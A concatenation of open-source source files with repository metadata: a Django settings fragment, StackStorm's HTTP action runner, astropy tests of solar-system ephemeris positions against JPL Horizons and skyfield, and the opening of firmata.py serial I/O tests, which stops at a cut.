# Allow all host headers
ALLOWED_HOSTS = ['*']
# Needed number of signs
SIGNS_GOAL = 1000
if DEBUG:
SIGNS_GOAL = 5
DEADLINE_INTERVAL = 30 # 30 days
| apache-2.0 |
dennybaa/st2 | st2actions/st2actions/runners/httprunner.py | 2 | 9655 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import copy
import json
import uuid
import requests
from oslo_config import cfg
from st2actions.runners import ActionRunner
from st2common import __version__ as st2_version
from st2common import log as logging
from st2common.constants.action import LIVEACTION_STATUS_SUCCEEDED
from st2common.constants.action import LIVEACTION_STATUS_FAILED
from st2common.constants.action import LIVEACTION_STATUS_TIMED_OUT
LOG = logging.getLogger(__name__)
SUCCESS_STATUS_CODES = [code for code in range(200, 207)]
# Lookup constants for runner params
RUNNER_ON_BEHALF_USER = 'user'
RUNNER_URL = 'url'
RUNNER_HEADERS = 'headers' # Debatable whether this should be action params.
RUNNER_COOKIES = 'cookies'
RUNNER_ALLOW_REDIRECTS = 'allow_redirects'
RUNNER_HTTP_PROXY = 'http_proxy'
RUNNER_HTTPS_PROXY = 'https_proxy'
RUNNER_VERIFY_SSL_CERT = 'verify_ssl_cert'
# Lookup constants for action params
ACTION_AUTH = 'auth'
ACTION_BODY = 'body'
ACTION_TIMEOUT = 'timeout'
ACTION_METHOD = 'method'
ACTION_QUERY_PARAMS = 'params'
FILE_NAME = 'file_name'
FILE_CONTENT = 'file_content'
FILE_CONTENT_TYPE = 'file_content_type'
RESPONSE_BODY_PARSE_FUNCTIONS = {
'application/json': json.loads
}
def get_runner():
return HttpRunner(str(uuid.uuid4()))
class HttpRunner(ActionRunner):
def __init__(self, runner_id):
super(HttpRunner, self).__init__(runner_id=runner_id)
self._on_behalf_user = cfg.CONF.system_user.user
self._timeout = 60
def pre_run(self):
LOG.debug('Entering HttpRunner.pre_run() for liveaction_id="%s"', self.liveaction_id)
self._on_behalf_user = self.runner_parameters.get(RUNNER_ON_BEHALF_USER,
self._on_behalf_user)
self._url = self.runner_parameters.get(RUNNER_URL, None)
self._headers = self.runner_parameters.get(RUNNER_HEADERS, {})
self._cookies = self.runner_parameters.get(RUNNER_COOKIES, None)
self._allow_redirects = self.runner_parameters.get(RUNNER_ALLOW_REDIRECTS, False)
self._http_proxy = self.runner_parameters.get(RUNNER_HTTP_PROXY, None)
self._https_proxy = self.runner_parameters.get(RUNNER_HTTPS_PROXY, None)
self._verify_ssl_cert = self.runner_parameters.get(RUNNER_VERIFY_SSL_CERT, None)
def run(self, action_parameters):
client = self._get_http_client(action_parameters)
try:
result = client.run()
except requests.exceptions.Timeout as e:
result = {'error': str(e)}
status = LIVEACTION_STATUS_TIMED_OUT
else:
status = HttpRunner._get_result_status(result.get('status_code', None))
return (status, result, None)
def _get_http_client(self, action_parameters):
body = action_parameters.get(ACTION_BODY, None)
timeout = float(action_parameters.get(ACTION_TIMEOUT, self._timeout))
method = action_parameters.get(ACTION_METHOD, None)
params = action_parameters.get(ACTION_QUERY_PARAMS, None)
auth = action_parameters.get(ACTION_AUTH, {})
file_name = action_parameters.get(FILE_NAME, None)
file_content = action_parameters.get(FILE_CONTENT, None)
file_content_type = action_parameters.get(FILE_CONTENT_TYPE, None)
# Include our user agent and action name so requests can be tracked back
headers = copy.deepcopy(self._headers) if self._headers else {}
headers['User-Agent'] = 'st2/v%s' % (st2_version)
headers['X-Stanley-Action'] = self.action_name
if file_name and file_content:
files = {}
if file_content_type:
value = (file_content, file_content_type)
else:
value = (file_content)
files[file_name] = value
else:
files = None
proxies = {}
if self._http_proxy:
proxies['http'] = self._http_proxy
if self._https_proxy:
proxies['https'] = self._https_proxy
return HTTPClient(url=self._url, method=method, body=body, params=params,
headers=headers, cookies=self._cookies, auth=auth,
timeout=timeout, allow_redirects=self._allow_redirects,
proxies=proxies, files=files, verify=self._verify_ssl_cert)
@staticmethod
def _get_result_status(status_code):
return LIVEACTION_STATUS_SUCCEEDED if status_code in SUCCESS_STATUS_CODES \
else LIVEACTION_STATUS_FAILED
class HTTPClient(object):
def __init__(self, url=None, method=None, body='', params=None, headers=None, cookies=None,
auth=None, timeout=60, allow_redirects=False, proxies=None,
files=None, verify=False):
if url is None:
raise Exception('URL must be specified.')
if method is None:
if files or body:
method = 'POST'
else:
method = 'GET'
headers = headers or {}
normalized_headers = self._normalize_headers(headers=headers)
if body and 'content-length' not in normalized_headers:
headers['Content-Length'] = len(body)
self.url = url
self.method = method
self.headers = headers
self.body = body
self.params = params
self.headers = headers
self.cookies = cookies
self.auth = auth
self.timeout = timeout
self.allow_redirects = allow_redirects
self.proxies = proxies
self.files = files
self.verify = verify
def run(self):
results = {}
resp = None
json_content = self._is_json_content()
try:
if json_content:
# cast params (body) to dict
data = self._cast_object(self.body)
try:
data = json.dumps(data)
except ValueError:
msg = 'Request body (%s) can\'t be parsed as JSON' % (data)
raise ValueError(msg)
else:
data = self.body
resp = requests.request(
self.method,
self.url,
params=self.params,
data=data,
headers=self.headers,
cookies=self.cookies,
auth=self.auth,
timeout=self.timeout,
allow_redirects=self.allow_redirects,
proxies=self.proxies,
files=self.files,
verify=self.verify
)
headers = dict(resp.headers)
body, parsed = self._parse_response_body(headers=headers, body=resp.text)
results['status_code'] = resp.status_code
results['body'] = body
results['parsed'] = parsed # flag which indicates if body has been parsed
results['headers'] = headers
return results
except Exception as e:
LOG.exception('Exception making request to remote URL: %s, %s', self.url, e)
raise
finally:
if resp:
resp.close()
def _parse_response_body(self, headers, body):
"""
:param body: Response body.
:type body: ``str``
:return: (parsed body, flag which indicates if body has been parsed)
:rtype: (``object``, ``bool``)
"""
body = body or ''
headers = self._normalize_headers(headers=headers)
content_type = headers.get('content-type', None)
parsed = False
if not content_type:
return (body, parsed)
# The header can also contain charset which we simply discard
content_type = content_type.split(';')[0]
parse_func = RESPONSE_BODY_PARSE_FUNCTIONS.get(content_type, None)
if not parse_func:
return (body, parsed)
LOG.debug('Parsing body with content type: %s', content_type)
try:
body = parse_func(body)
except Exception:
LOG.exception('Failed to parse body')
else:
parsed = True
return (body, parsed)
def _normalize_headers(self, headers):
"""
Normalize the header keys by lowercasing all the keys.
"""
result = {}
for key, value in headers.items():
result[key.lower()] = value
return result
def _is_json_content(self):
normalized = self._normalize_headers(self.headers)
return normalized.get('content-type', None) == 'application/json'
def _cast_object(self, value):
if isinstance(value, str) or isinstance(value, unicode):
try:
return json.loads(value)
except:
return ast.literal_eval(value)
else:
return value
| apache-2.0 |
StuartLittlefair/astropy | astropy/coordinates/tests/test_solar_system.py | 1 | 19799 | import os
import pytest
import numpy as np
from urllib.error import HTTPError
from astropy.time import Time
from astropy import units as u
from astropy.constants import c
from astropy.coordinates.builtin_frames import GCRS, TETE
from astropy.coordinates.earth import EarthLocation
from astropy.coordinates.sky_coordinate import SkyCoord
from astropy.coordinates.representation import CartesianRepresentation, UnitSphericalRepresentation
from astropy.coordinates.solar_system import (get_body, get_moon, BODY_NAME_TO_KERNEL_SPEC,
_get_apparent_body_position, solar_system_ephemeris,
get_body_barycentric, get_body_barycentric_posvel)
from astropy.coordinates.funcs import get_sun
from astropy.tests.helper import assert_quantity_allclose
from astropy.units import allclose as quantity_allclose
from astropy.utils.data import download_file
try:
import jplephem # pylint: disable=W0611
except ImportError:
HAS_JPLEPHEM = False
else:
HAS_JPLEPHEM = True
try:
from skyfield.api import Loader, Topos # pylint: disable=W0611
except ImportError:
HAS_SKYFIELD = False
else:
HAS_SKYFIELD = True
de432s_separation_tolerance_planets = 5*u.arcsec
de432s_separation_tolerance_moon = 5*u.arcsec
de432s_distance_tolerance = 20*u.km
skyfield_angular_separation_tolerance = 1*u.arcsec
skyfield_separation_tolerance = 10*u.km
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_SKYFIELD')
def test_positions_skyfield(tmpdir):
"""
Test positions against those generated by skyfield.
"""
load = Loader(tmpdir)
t = Time('1980-03-25 00:00')
location = None
# skyfield ephemeris
try:
planets = load('de421.bsp')
ts = load.timescale()
except OSError as e:
if os.environ.get('CI', False) and 'timed out' in str(e):
pytest.xfail('Timed out in CI')
else:
raise
mercury, jupiter, moon = planets['mercury'], planets['jupiter barycenter'], planets['moon']
earth = planets['earth']
skyfield_t = ts.from_astropy(t)
if location is not None:
earth = earth+Topos(latitude_degrees=location.lat.to_value(u.deg),
longitude_degrees=location.lon.to_value(u.deg),
elevation_m=location.height.to_value(u.m))
skyfield_mercury = earth.at(skyfield_t).observe(mercury).apparent()
skyfield_jupiter = earth.at(skyfield_t).observe(jupiter).apparent()
skyfield_moon = earth.at(skyfield_t).observe(moon).apparent()
if location is not None:
frame = TETE(obstime=t, location=location)
else:
frame = TETE(obstime=t)
ra, dec, dist = skyfield_mercury.radec(epoch='date')
skyfield_mercury = SkyCoord(ra.to(u.deg), dec.to(u.deg), distance=dist.to(u.km),
frame=frame)
ra, dec, dist = skyfield_jupiter.radec(epoch='date')
skyfield_jupiter = SkyCoord(ra.to(u.deg), dec.to(u.deg), distance=dist.to(u.km),
frame=frame)
ra, dec, dist = skyfield_moon.radec(epoch='date')
skyfield_moon = SkyCoord(ra.to(u.deg), dec.to(u.deg), distance=dist.to(u.km),
frame=frame)
# planet positions w.r.t true equator and equinox
moon_astropy = get_moon(t, location, ephemeris='de430').transform_to(frame)
mercury_astropy = get_body('mercury', t, location, ephemeris='de430').transform_to(frame)
jupiter_astropy = get_body('jupiter', t, location, ephemeris='de430').transform_to(frame)
assert (moon_astropy.separation(skyfield_moon) <
skyfield_angular_separation_tolerance)
assert (moon_astropy.separation_3d(skyfield_moon) < skyfield_separation_tolerance)
assert (jupiter_astropy.separation(skyfield_jupiter) <
skyfield_angular_separation_tolerance)
assert (jupiter_astropy.separation_3d(skyfield_jupiter) <
skyfield_separation_tolerance)
assert (mercury_astropy.separation(skyfield_mercury) <
skyfield_angular_separation_tolerance)
assert (mercury_astropy.separation_3d(skyfield_mercury) <
skyfield_separation_tolerance)
class TestPositionsGeocentric:
"""
Test positions against those generated by JPL Horizons accessed on
2016-03-28, with refraction turned on.
"""
def setup(self):
self.t = Time('1980-03-25 00:00')
self.apparent_frame = TETE(obstime=self.t)
# Results returned by JPL Horizons web interface
self.horizons = {
'mercury': SkyCoord(ra='22h41m47.78s', dec='-08d29m32.0s',
distance=c*6.323037*u.min, frame=self.apparent_frame),
'moon': SkyCoord(ra='07h32m02.62s', dec='+18d34m05.0s',
distance=c*0.021921*u.min, frame=self.apparent_frame),
'jupiter': SkyCoord(ra='10h17m12.82s', dec='+12d02m57.0s',
distance=c*37.694557*u.min, frame=self.apparent_frame),
'sun': SkyCoord(ra='00h16m31.00s', dec='+01d47m16.9s',
distance=c*8.294858*u.min, frame=self.apparent_frame)}
@pytest.mark.parametrize(('body', 'sep_tol', 'dist_tol'),
(('mercury', 7.*u.arcsec, 1000*u.km),
('jupiter', 78.*u.arcsec, 76000*u.km),
('moon', 20.*u.arcsec, 80*u.km),
('sun', 5.*u.arcsec, 11.*u.km)))
def test_erfa_planet(self, body, sep_tol, dist_tol):
"""Test predictions using erfa/plan94.
Accuracies are maximum deviations listed in erfa/plan94.c, for Jupiter and
Mercury, and that quoted in Meeus "Astronomical Algorithms" (1998) for the Moon.
"""
astropy = get_body(body, self.t, ephemeris='builtin')
horizons = self.horizons[body]
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert astropy.separation(horizons) < sep_tol
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=dist_tol)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('body', ('mercury', 'jupiter', 'sun'))
def test_de432s_planet(self, body):
astropy = get_body(body, self.t, ephemeris='de432s')
horizons = self.horizons[body]
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert (astropy.separation(horizons) <
de432s_separation_tolerance_planets)
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=de432s_distance_tolerance)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_de432s_moon(self):
astropy = get_moon(self.t, ephemeris='de432s')
horizons = self.horizons['moon']
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert (astropy.separation(horizons) <
de432s_separation_tolerance_moon)
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=de432s_distance_tolerance)
class TestPositionKittPeak:
"""
Test positions against those generated by JPL Horizons accessed on
2016-03-28, with refraction turned on.
"""
def setup(self):
kitt_peak = EarthLocation.from_geodetic(lon=-111.6*u.deg,
lat=31.963333333333342*u.deg,
height=2120*u.m)
self.t = Time('2014-09-25T00:00', location=kitt_peak)
self.apparent_frame = TETE(obstime=self.t, location=kitt_peak)
# Results returned by JPL Horizons web interface
self.horizons = {
'mercury': SkyCoord(ra='13h38m58.50s', dec='-13d34m42.6s',
distance=c*7.699020*u.min, frame=self.apparent_frame),
'moon': SkyCoord(ra='12h33m12.85s', dec='-05d17m54.4s',
distance=c*0.022054*u.min, frame=self.apparent_frame),
'jupiter': SkyCoord(ra='09h09m55.55s', dec='+16d51m57.8s',
distance=c*49.244937*u.min, frame=self.apparent_frame)}
@pytest.mark.parametrize(('body', 'sep_tol', 'dist_tol'),
(('mercury', 7.*u.arcsec, 500*u.km),
('jupiter', 78.*u.arcsec, 82000*u.km)))
def test_erfa_planet(self, body, sep_tol, dist_tol):
"""Test predictions using erfa/plan94.
Accuracies are maximum deviations listed in erfa/plan94.c.
"""
# Add uncertainty in position of Earth
dist_tol = dist_tol + 1300 * u.km
astropy = get_body(body, self.t, ephemeris='builtin')
horizons = self.horizons[body]
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert astropy.separation(horizons) < sep_tol
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=dist_tol)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('body', ('mercury', 'jupiter'))
def test_de432s_planet(self, body):
astropy = get_body(body, self.t, ephemeris='de432s')
horizons = self.horizons[body]
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert (astropy.separation(horizons) <
de432s_separation_tolerance_planets)
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=de432s_distance_tolerance)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_de432s_moon(self):
astropy = get_moon(self.t, ephemeris='de432s')
horizons = self.horizons['moon']
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert (astropy.separation(horizons) <
de432s_separation_tolerance_moon)
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=de432s_distance_tolerance)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('bodyname', ('mercury', 'jupiter'))
def test_custom_kernel_spec_body(self, bodyname):
"""
Checks that giving a kernel specifier instead of a body name works
"""
coord_by_name = get_body(bodyname, self.t, ephemeris='de432s')
kspec = BODY_NAME_TO_KERNEL_SPEC[bodyname]
coord_by_kspec = get_body(kspec, self.t, ephemeris='de432s')
assert_quantity_allclose(coord_by_name.ra, coord_by_kspec.ra)
assert_quantity_allclose(coord_by_name.dec, coord_by_kspec.dec)
assert_quantity_allclose(coord_by_name.distance, coord_by_kspec.distance)
@pytest.mark.remote_data
def test_horizons_consistency_with_precision():
"""
A test to compare at high precision against output of JPL horizons.
Tests ephemerides, and conversions from ICRS to GCRS to TETE. We are aiming for
better than 2 milli-arcsecond precision.
We use the Moon since it is nearby, and moves fast in the sky so we are
testing for parallax, proper handling of light deflection and aberration.
"""
# JPL Horizon values for 2020_04_06 00:00 to 23:00 in 1 hour steps
# JPL Horizons has a known offset (frame bias) of 51.02 mas in RA. We correct that here
ra_apparent_horizons = [
170.167332531, 170.560688674, 170.923834838, 171.271663481, 171.620188972, 171.985340827,
172.381766539, 172.821772139, 173.314502650, 173.865422398, 174.476108551, 175.144332386,
175.864375310, 176.627519827, 177.422655853, 178.236955730, 179.056584831, 179.867427392,
180.655815385, 181.409252074, 182.117113814, 182.771311578, 183.366872837, 183.902395443
] * u.deg + 51.02376467 * u.mas
dec_apparent_horizons = [
10.269112037, 10.058820647, 9.837152044, 9.603724551, 9.358956528, 9.104012390, 8.840674927,
8.571162442, 8.297917326, 8.023394488, 7.749873882, 7.479312991, 7.213246666, 6.952732614,
6.698336823, 6.450150213, 6.207828142, 5.970645962, 5.737565957, 5.507313851, 5.278462034,
5.049521497, 4.819038911, 4.585696512
] * u.deg
with solar_system_ephemeris.set('de430'):
loc = EarthLocation.from_geodetic(-67.787260*u.deg, -22.959748*u.deg, 5186*u.m)
times = Time('2020-04-06 00:00') + np.arange(0, 24, 1)*u.hour
astropy = get_body('moon', times, loc)
apparent_frame = TETE(obstime=times, location=loc)
astropy = astropy.transform_to(apparent_frame)
usrepr = UnitSphericalRepresentation(ra_apparent_horizons, dec_apparent_horizons)
horizons = apparent_frame.realize_frame(usrepr)
assert_quantity_allclose(astropy.separation(horizons), 0*u.mas, atol=1.5*u.mas)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('time', (Time('1960-01-12 00:00'),
Time('1980-03-25 00:00'),
Time('2010-10-13 00:00')))
def test_get_sun_consistency(time):
"""
Test that the sun from JPL and the builtin get_sun match
"""
sun_jpl_gcrs = get_body('sun', time, ephemeris='de432s')
builtin_get_sun = get_sun(time)
sep = builtin_get_sun.separation(sun_jpl_gcrs)
assert sep < 0.1*u.arcsec
def test_get_moon_nonscalar_regression():
"""
Test that the builtin ephemeris works with non-scalar times.
See Issue #5069.
"""
times = Time(["2015-08-28 03:30", "2015-09-05 10:30"])
# the following line will raise an Exception if the bug recurs.
get_moon(times, ephemeris='builtin')
def test_barycentric_pos_posvel_same():
# Check that the two routines give identical results.
ep1 = get_body_barycentric('earth', Time('2016-03-20T12:30:00'))
ep2, _ = get_body_barycentric_posvel('earth', Time('2016-03-20T12:30:00'))
assert np.all(ep1.xyz == ep2.xyz)
def test_earth_barycentric_velocity_rough():
# Check that a time near the equinox gives roughly the right result.
ep, ev = get_body_barycentric_posvel('earth', Time('2016-03-20T12:30:00'))
assert_quantity_allclose(ep.xyz, [-1., 0., 0.]*u.AU, atol=0.01*u.AU)
expected = u.Quantity([0.*u.one,
np.cos(23.5*u.deg),
np.sin(23.5*u.deg)]) * -30. * u.km / u.s
assert_quantity_allclose(ev.xyz, expected, atol=1.*u.km/u.s)
def test_earth_barycentric_velocity_multi_d():
# Might as well test it with a multidimensional array too.
t = Time('2016-03-20T12:30:00') + np.arange(8.).reshape(2, 2, 2) * u.yr / 2.
ep, ev = get_body_barycentric_posvel('earth', t)
# note: assert_quantity_allclose doesn't like the shape mismatch.
# this is a problem with np.testing.assert_allclose.
assert quantity_allclose(ep.get_xyz(xyz_axis=-1),
[[-1., 0., 0.], [+1., 0., 0.]]*u.AU,
atol=0.06*u.AU)
expected = u.Quantity([0.*u.one,
np.cos(23.5*u.deg),
np.sin(23.5*u.deg)]) * ([[-30.], [30.]] * u.km / u.s)
assert quantity_allclose(ev.get_xyz(xyz_axis=-1), expected,
atol=2.*u.km/u.s)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize(('body', 'pos_tol', 'vel_tol'),
(('mercury', 1000.*u.km, 1.*u.km/u.s),
('jupiter', 100000.*u.km, 2.*u.km/u.s),
('earth', 10*u.km, 10*u.mm/u.s)))
def test_barycentric_velocity_consistency(body, pos_tol, vel_tol):
# Tolerances are about 1.5 times the rms listed for plan94 and epv00,
# except for Mercury (which nominally is 334 km rms)
t = Time('2016-03-20T12:30:00')
ep, ev = get_body_barycentric_posvel(body, t, ephemeris='builtin')
dp, dv = get_body_barycentric_posvel(body, t, ephemeris='de432s')
assert_quantity_allclose(ep.xyz, dp.xyz, atol=pos_tol)
assert_quantity_allclose(ev.xyz, dv.xyz, atol=vel_tol)
# Might as well test it with a multidimensional array too.
t = Time('2016-03-20T12:30:00') + np.arange(8.).reshape(2, 2, 2) * u.yr / 2.
ep, ev = get_body_barycentric_posvel(body, t, ephemeris='builtin')
dp, dv = get_body_barycentric_posvel(body, t, ephemeris='de432s')
assert_quantity_allclose(ep.xyz, dp.xyz, atol=pos_tol)
assert_quantity_allclose(ev.xyz, dv.xyz, atol=vel_tol)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('time', (Time('1960-01-12 00:00'),
Time('1980-03-25 00:00'),
Time('2010-10-13 00:00')))
def test_url_or_file_ephemeris(time):
# URL for ephemeris de432s used for testing:
url = 'http://naif.jpl.nasa.gov/pub/naif/generic_kernels/spk/planets/de432s.bsp'
# Pass the ephemeris directly as a URL.
coord_by_url = get_body('earth', time, ephemeris=url)
# Translate the URL to the cached location on the filesystem.
# Since we just used the url above, it should already have been downloaded.
filepath = download_file(url, cache=True)
# Get the coordinates using the file path directly:
coord_by_filepath = get_body('earth', time, ephemeris=filepath)
# Using the URL or filepath should give exactly the same results:
assert_quantity_allclose(coord_by_url.ra, coord_by_filepath.ra)
assert_quantity_allclose(coord_by_url.dec, coord_by_filepath.dec)
assert_quantity_allclose(coord_by_url.distance, coord_by_filepath.distance)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_url_ephemeris_wrong_input():
# Try loading a non-existing URL:
time = Time('1960-01-12 00:00')
with pytest.raises(HTTPError):
get_body('earth', time, ephemeris='http://data.astropy.org/path/to/nonexisting/file.bsp')
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_file_ephemeris_wrong_input():
time = Time('1960-01-12 00:00')
# Try loading a non-existing file:
with pytest.raises(ValueError):
get_body('earth', time, ephemeris='/path/to/nonexisting/file.bsp')
# Try loading a file that does exist, but is not an ephemeris file:
with pytest.raises(ValueError):
get_body('earth', time, ephemeris=__file__)
def test_regression_10271():
t = Time(58973.534052125986, format='mjd')
# GCRS position of ALMA at this time
obs_p = CartesianRepresentation(5724535.74068625, -1311071.58985697, -2492738.93017009, u.m)
geocentre = CartesianRepresentation(0, 0, 0, u.m)
icrs_sun_from_alma = _get_apparent_body_position('sun', t, 'builtin', obs_p)
icrs_sun_from_geocentre = _get_apparent_body_position('sun', t, 'builtin', geocentre)
difference = (icrs_sun_from_alma - icrs_sun_from_geocentre).norm()
assert_quantity_allclose(difference, 0.13046941*u.m, atol=1*u.mm)
| bsd-3-clause |
google/firmata.py | tests/test_io.py | 1 | 14001 | # Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2 as unittest
import serial
import firmata
from firmata import io
from firmata.constants import *
FIRMATA_INIT = [chr(i) for i in (
PROTOCOL_VERSION, 0x5, 0x2, # Version 5.2
SYSEX_START, SE_REPORT_FIRMWARE, 0x5, 0x2, 0x54, 0x0, 0x65, 0x0, 0x73, 0x0, 0x74, 0x0, SYSEX_END, # Firmware 'Test'
)]
ARDUINO_CAPABILITY = [chr(i) for i in (
SYSEX_START, SE_CAPABILITY_RESPONSE,
0x7f,
0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x3, 0x8, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x4, 0xe, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x6, 0x1, 0x7f,
0x0, 0x1, 0x1, 0x1, 0x2, 0xa, 0x6, 0x1, 0x7f, SYSEX_END,
)]
ARDUINO_ANALOG_MAPPING = [chr(i) for i in (
SYSEX_START, SE_ANALOG_MAPPING_RESPONSE,
0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f, 0x7f,
0x0, 0x01, 0x02, 0x03, 0x04, 0x05, SYSEX_END,
)]
ARDUINO_BOARD_STATE = [chr(i) for i in (
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x00, 0x01, 0x00, SYSEX_END, # pin 1, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x02, 0x01, 0x00, SYSEX_END, # pin 2, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x03, 0x01, 0x00, SYSEX_END, # pin 3, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x04, 0x01, 0x00, SYSEX_END, # pin 4, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x05, 0x01, 0x00, SYSEX_END, # pin 5, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x06, 0x01, 0x00, SYSEX_END, # pin 6, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x07, 0x01, 0x00, SYSEX_END, # pin 7, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x08, 0x01, 0x00, SYSEX_END, # pin 8, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x09, 0x01, 0x00, SYSEX_END, # pin 9, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0a, 0x01, 0x00, SYSEX_END, # pin 10, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0b, 0x01, 0x00, SYSEX_END, # pin 11, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0c, 0x01, 0x00, SYSEX_END, # pin 12, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0d, 0x01, 0x00, SYSEX_END, # pin 13, digital output, low
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0e, 0x02, 0x00, SYSEX_END, # pin 14 (A0), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x0f, 0x02, 0x00, SYSEX_END, # pin 15 (A1), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x10, 0x02, 0x00, SYSEX_END, # pin 16 (A2), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x11, 0x02, 0x00, SYSEX_END, # pin 17 (A3), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x12, 0x02, 0x00, SYSEX_END, # pin 18 (A4), analog input, 0
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x13, 0x02, 0x00, SYSEX_END, # pin 19 (A5), analog input, 0
)]
MONDO_DATA = [chr(i) for i in (
ANALOG_MESSAGE_0, 0x23, 0x00, # Pin A0 set to 0x23
DIGITAL_MESSAGE_0, 0b00000100, 0b00000000, # Pin 2 set.
SYSEX_START, SE_PIN_STATE_RESPONSE, 0x04, 0x01, 0x00, SYSEX_END, # Report pin 4 mode and state
SYSEX_START, SE_RESERVED_COMMAND, 0x20, SYSEX_END # Hypothetical reserved command
)]
FIRMATA_UNKNOWN = [chr(i) for i in (
SYSEX_START, SE_RESERVED_COMMAND, 0x20, SYSEX_END # Hypothetical reserved command
)]
FIRMATA_STRING_DATA = [chr(i) for i in (
SYSEX_START, SE_STRING_DATA, 0x48, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x6C, 0x00, 0x6F, 0x00, SYSEX_END,
)]
I2C_REPLY_MESSAGE = [chr(i) for i in (
# | addr | reg | byte0 | byte1 |
SYSEX_START, SE_I2C_REPLY, 0x4f, 0x00, 0x00, 0x00, 0x7f, 0x01, 0x00, 0x00, SYSEX_END,
)]
I2C_REPLY_DICT = dict(token='I2C_REPLY', addr=0x4f, reg=0x00, data=[0xff, 0x00])
class MockSerial(object):
def __init__(self, *args, **kargs):
self.data = []
self.output = []
def inWaiting(self):
return len(self.data)
def read(self, num=1, *args, **kargs):
